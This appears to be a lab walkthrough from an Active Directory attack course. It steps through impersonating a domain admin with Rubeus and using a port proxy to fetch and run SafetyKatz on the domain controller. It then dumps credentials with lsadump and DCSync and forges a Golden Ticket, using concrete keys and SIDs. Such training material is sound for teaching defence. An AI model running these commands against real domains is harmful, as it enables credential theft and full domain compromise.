Obj 8 Golden Ticket / DCSync

Task - Extract secrets from DA, Create a Golden Ticket, Use Golden Ticket

This Module starts with creating a new session as DA. When running the below command do NOT use invishell. Simply open a terminal as Administrator and run the command.

Use Rubeus to create a new session to start a new session as svcadmin which has DA privileges

C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Copy Loader.exe to the DC

echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y

We can use winrs or PSSession to access the DC

winrs -r:dcorp-dc cmd

Now we are going to forward port 8080 on the DC back to us

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.x

Now we can access our file directory on our studentvm

C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe

We should now have a mimikatz # term to run commands in

The below command will dump the creds of the DC

lsadump::lsa /patch

- DCSYNYC -

To get NTLM hash and AES keys of the krbtgt account, we can use the DCSync attack

C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"

- GOLDEN TICKET -

we can use BetterSafetyKatz.exe to create a Golden ticket

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /aes256:e28b3a5c60e087c8489a410a1199235efaf3b9f125972c7a1e7618a7469bfd6a /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

Now we can access the DC

PS C:\AD\Tools> ls \\dcorp-dc\c$

We can also run WMI commands on the DC:

PS C:\AD\Tools> gwmi -Class win32_computersystem -ComputerName dcorp-dc

PreviousObj 7 Derivative Local Admin NextObj 9 Silver Ticket for Host

Last updated 3 years ago